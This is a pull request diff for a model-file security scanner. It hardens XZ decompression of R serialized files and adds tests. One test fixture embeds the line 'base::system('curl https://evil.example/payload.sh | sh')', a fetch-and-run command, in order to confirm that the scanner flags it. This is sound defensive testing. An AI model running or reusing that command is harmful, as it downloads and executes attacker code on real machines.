Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
147 changes: 141 additions & 6 deletions modelaudit/scanners/r_serialized_scanner.py
Original file line number Diff line number Diff line change
Expand Up @@ -35,6 +35,9 @@ class RSerializedScanner(BaseScanner):
_XZ_MAGIC: ClassVar[bytes] = b"\xfd7zXZ\x00"

_CAN_HANDLE_DECOMPRESSED_LIMIT: ClassVar[int] = 128 * 1024
_SIGNATURE_PROBE_BYTES: ClassVar[int] = 7
_XZ_DECOMPRESS_MEMLIMIT: ClassVar[int] = 128 * 1024 * 1024
_XZ_READ_CHUNK_SIZE: ClassVar[int] = 64 * 1024
_PRINTABLE_RE: ClassVar[re.Pattern[bytes]] = re.compile(rb"[ -~]{3,512}")
_EXECUTABLE_SYMBOL_RE: ClassVar[re.Pattern[str]] = re.compile(
r"(?<![\w.])(?:base::|utils::)?"
Expand Down Expand Up @@ -102,7 +105,7 @@ def can_handle(cls, path: str) -> bool:

try:
prefix = cls._read_decompressed_prefix(path, compression, cls._CAN_HANDLE_DECOMPRESSED_LIMIT)
except (EOFError, OSError, ValueError, gzip.BadGzipFile, lzma.LZMAError):
except (EOFError, OSError, gzip.BadGzipFile, lzma.LZMAError):
# Corrupt compressed wrappers should still route to this scanner.
return True
Comment on lines 106 to 110
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

Catch probe-time memory failures in can_handle to preserve fail-open routing intent.

can_handle treats corrupt compressed wrappers as routable to this scanner, but MemoryError is not included in this probe exception list. A probe-time allocation failure can bypass that intent and abort routing unexpectedly.

💡 Proposed fix
-        except (EOFError, OSError, gzip.BadGzipFile, lzma.LZMAError):
+        except (EOFError, OSError, MemoryError, gzip.BadGzipFile, lzma.LZMAError):
             # Corrupt compressed wrappers should still route to this scanner.
             return True
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@modelaudit/scanners/r_serialized_scanner.py` around lines 106 - 110, The
can_handle probe currently catches EOFError, OSError, gzip.BadGzipFile, and
lzma.LZMAError when calling cls._read_decompressed_prefix but omits MemoryError,
which can cause probe-time allocation failures to escape and stop fail-open
routing; update the except clause in ModelSerializedScanner.can_handle (the try
around cls._read_decompressed_prefix(path, compression,
cls._CAN_HANDLE_DECOMPRESSED_LIMIT)) to also catch MemoryError so
corrupt/compressed wrappers and allocation failures both return True and
preserve the intended routing behavior.


Expand Down Expand Up @@ -141,10 +144,124 @@ def _read_decompressed_prefix(cls, path: str, compression: str, limit: int) -> b
with bz2.open(path, "rb") as stream:
return stream.read(read_limit)[:limit]
if compression == "xz":
with lzma.open(path, "rb") as stream:
return stream.read(read_limit)[:limit]
return cls._read_xz_signature_prefix(
path=path,
limit=min(limit, cls._SIGNATURE_PROBE_BYTES),
memlimit=cls._XZ_DECOMPRESS_MEMLIMIT,
)
return b""

@classmethod
def _read_xz_signature_prefix(cls, path: str, limit: int, memlimit: int) -> bytes:
if limit <= 0:
return b""

decompressor = lzma.LZMADecompressor(format=lzma.FORMAT_XZ, memlimit=memlimit)
prefix = bytearray()
pending = b""

with open(path, "rb") as file_obj:
while len(prefix) < limit:
if not pending:
pending = file_obj.read(cls._XZ_READ_CHUNK_SIZE)

if not pending:
if not decompressor.eof:
raise EOFError("Incomplete XZ stream ended before EOF marker")
break

piece = decompressor.decompress(pending, max_length=limit - len(prefix))
pending = decompressor.unused_data

while True:
if piece:
prefix.extend(piece)
if len(prefix) >= limit:
return bytes(prefix)

if decompressor.eof or decompressor.needs_input:
break

piece = decompressor.decompress(b"", max_length=limit - len(prefix))

if decompressor.eof:
if not pending:
pending = file_obj.read(cls._XZ_READ_CHUNK_SIZE)
if not pending:
break
decompressor = lzma.LZMADecompressor(format=lzma.FORMAT_XZ, memlimit=memlimit)
continue

pending = b""

return bytes(prefix)

@classmethod
def _read_xz_with_memlimit(
cls,
path: str,
output_limit: int,
memlimit: int,
*,
compressed_size: int,
max_decompressed_bytes: int,
max_decompression_ratio: float,
) -> tuple[bytes, bool, int]:
decompressor = lzma.LZMADecompressor(format=lzma.FORMAT_XZ, memlimit=memlimit)
decompressed = bytearray()
total_decompressed = 0
truncated = False
pending = b""

with open(path, "rb") as file_obj:
while True:
if not pending:
pending = file_obj.read(cls._XZ_READ_CHUNK_SIZE)

if not pending:
if not truncated and not decompressor.eof:
raise EOFError("Incomplete XZ stream ended before EOF marker")
break

piece = decompressor.decompress(pending, max_length=cls._XZ_READ_CHUNK_SIZE)
pending = decompressor.unused_data
while True:
if piece:
total_decompressed += len(piece)
if total_decompressed > max_decompressed_bytes:
raise ValueError(f"Decompressed stream exceeded limit ({max_decompressed_bytes} bytes)")

if compressed_size > 0 and total_decompressed / compressed_size > max_decompression_ratio:
raise ValueError(
f"Suspicious decompression ratio ({total_decompressed / compressed_size:.1f}x > "
f"{max_decompression_ratio:.1f}x)"
)

remaining = max(output_limit - len(decompressed), 0)
decompressed.extend(piece[:remaining])
if len(piece) > remaining:
truncated = True

if truncated or decompressor.eof or decompressor.needs_input:
break

piece = decompressor.decompress(b"", max_length=cls._XZ_READ_CHUNK_SIZE)

if truncated:
break

if decompressor.eof:
if not pending:
pending = file_obj.read(cls._XZ_READ_CHUNK_SIZE)
if not pending:
break
decompressor = lzma.LZMADecompressor(format=lzma.FORMAT_XZ, memlimit=memlimit)
continue

pending = b""

return bytes(decompressed), truncated, total_decompressed

Comment thread
coderabbitai[bot] marked this conversation as resolved.
def _read_payload_for_analysis(self, path: str, file_size: int) -> tuple[bytes, str, bool, int]:
with open(path, "rb") as file_obj:
header = file_obj.read(16)
Expand All @@ -163,8 +280,14 @@ def _read_payload_for_analysis(self, path: str, file_size: int) -> tuple[bytes,
with bz2.open(path, "rb") as stream:
payload, truncated, total_decompressed = self._read_decompressed_stream(stream, file_size)
else:
with lzma.open(path, "rb") as stream:
payload, truncated, total_decompressed = self._read_decompressed_stream(stream, file_size)
payload, truncated, total_decompressed = self._read_xz_with_memlimit(
path=path,
output_limit=self.max_scan_bytes,
memlimit=self.max_decompressed_bytes,
compressed_size=file_size,
max_decompressed_bytes=self.max_decompressed_bytes,
max_decompression_ratio=self.max_decompression_ratio,
)

return payload, compression, truncated, total_decompressed

Expand Down Expand Up @@ -474,7 +597,7 @@ def scan(self, path: str) -> ScanResult:

try:
payload, compression, truncated, decompressed_bytes = self._read_payload_for_analysis(path, file_size)
except (EOFError, OSError, ValueError, gzip.BadGzipFile, lzma.LZMAError) as exc:
except (EOFError, OSError, ValueError, MemoryError, gzip.BadGzipFile, lzma.LZMAError) as exc:
result.add_check(
name="R Serialized Decompression",
passed=False,
Expand All @@ -490,6 +613,18 @@ def scan(self, path: str) -> ScanResult:
result.finish(success=False)
return result

result.add_check(
name="R Serialized Decompression",
passed=True,
message="Safely decoded R serialized payload for analysis",
location=path,
details={
"compression": compression,
"compressed_bytes": file_size,
"decompressed_bytes": decompressed_bytes,
},
)

if not payload:
result.add_check(
name="R Serialization Signature",
Expand Down
111 changes: 111 additions & 0 deletions tests/scanners/test_r_serialized_scanner.py
Original file line number Diff line number Diff line change
@@ -1,8 +1,10 @@
from __future__ import annotations

import gzip
import lzma
from pathlib import Path

from modelaudit import core
from modelaudit.scanners import get_scanner_for_file
from modelaudit.scanners.base import Check, CheckStatus, IssueSeverity, ScanResult
from modelaudit.scanners.r_serialized_scanner import RSerializedScanner
Expand All @@ -20,6 +22,28 @@ def _write_gzip_r_serialized(path: Path, body: str, *, workspace_header: bool =
stream.write((payload_prefix + body).encode("utf-8"))


def _write_xz_r_serialized(path: Path, body: str, *, dict_size: int) -> None:
payload = ("X\n" + body).encode("utf-8")
compressed = lzma.compress(
payload,
format=lzma.FORMAT_XZ,
filters=[{"id": lzma.FILTER_LZMA2, "dict_size": dict_size}],
)
path.write_bytes(compressed)


def _write_concatenated_xz_r_serialized(path: Path, bodies: list[str], *, dict_size: int) -> None:
compressed_parts = [
lzma.compress(
("X\n" + body).encode("utf-8"),
format=lzma.FORMAT_XZ,
filters=[{"id": lzma.FILTER_LZMA2, "dict_size": dict_size}],
)
for body in bodies
]
path.write_bytes(b"".join(compressed_parts))


def _check_by_name(result: ScanResult, name: str) -> list[Check]:
return [check for check in result.checks if check.name == name]

Expand Down Expand Up @@ -157,6 +181,93 @@ def test_scan_corrupt_gzip_stream_is_handled_fail_closed(tmp_path: Path) -> None
assert decompression_checks[0].status == CheckStatus.FAILED


def test_scan_xz_memory_limited_stream_is_handled_fail_closed(tmp_path: Path) -> None:
path = tmp_path / "memlimit.rds"
_write_xz_r_serialized(path, "safe", dict_size=1 << 24)

assert RSerializedScanner.can_handle(str(path))
scanner = RSerializedScanner(config={"r_max_decompressed_bytes": 1024})
result = scanner.scan(str(path))

assert result.success is False
decompression_checks = _check_by_name(result, "R Serialized Decompression")
assert len(decompression_checks) == 1
assert decompression_checks[0].status == CheckStatus.FAILED

Comment thread
coderabbitai[bot] marked this conversation as resolved.

def test_scan_benign_xz_stream_passes_decompression_checks(tmp_path: Path) -> None:
path = tmp_path / "safe-xz.rds"
_write_xz_r_serialized(path, "safe\nmodel\nweights", dict_size=1 << 24)

assert RSerializedScanner.can_handle(str(path))
result = RSerializedScanner().scan(str(path))

assert result.success is True
decompression_checks = _check_by_name(result, "R Serialized Decompression")
assert len(decompression_checks) == 1
assert decompression_checks[0].status == CheckStatus.PASSED


def test_scan_truncated_xz_stream_is_handled_fail_closed(tmp_path: Path) -> None:
path = tmp_path / "truncated-xz.rds"
_write_xz_r_serialized(path, "safe\nmodel\nweights", dict_size=1 << 20)
path.write_bytes(path.read_bytes()[:-16])

assert RSerializedScanner.can_handle(str(path))
result = RSerializedScanner().scan(str(path))

assert result.success is False
decompression_checks = _check_by_name(result, "R Serialized Decompression")
assert len(decompression_checks) == 1
assert decompression_checks[0].status == CheckStatus.FAILED


def test_scan_concatenated_xz_streams_preserve_later_malicious_payloads(tmp_path: Path) -> None:
path = tmp_path / "concatenated-xz.rds"
_write_concatenated_xz_r_serialized(
path,
[
"safe\nmodel\nweights",
"expression\nbase::system('curl https://evil.example/payload.sh | sh')",
],
dict_size=1 << 20,
)

assert RSerializedScanner.can_handle(str(path))
result = RSerializedScanner().scan(str(path))

assert result.success is False

symbol_checks = _check_by_name(result, "Executable Symbol Context Analysis")
assert len(symbol_checks) == 1
assert symbol_checks[0].status == CheckStatus.FAILED
assert symbol_checks[0].severity == IssueSeverity.CRITICAL

payload_checks = _check_by_name(result, "Serialized Expression Payload Detection")
assert len(payload_checks) == 1
assert payload_checks[0].status == CheckStatus.FAILED
assert payload_checks[0].severity == IssueSeverity.CRITICAL


def test_large_non_r_xz_payload_is_not_claimed_by_r_scanner(tmp_path: Path) -> None:
path = tmp_path / "not-r-bomb.rds"
payload = b"NOT_R_FORMAT\n" + (b"A" * 250_000)
path.write_bytes(
lzma.compress(
payload,
format=lzma.FORMAT_XZ,
filters=[{"id": lzma.FILTER_LZMA2, "dict_size": 1 << 20}],
)
)

assert not RSerializedScanner.can_handle(str(path))
assert get_scanner_for_file(str(path)) is None

result = core.scan_file(str(path))
assert result.scanner_name == "unknown"
assert _check_by_name(result, "R Serialized Decompression") == []


def test_r_serialized_routes_through_detection_and_registry(tmp_path: Path) -> None:
path = tmp_path / "model.rdata"
_write_raw_r_serialized(path, "workspace\nmodel", workspace_header=True)
Expand Down
Loading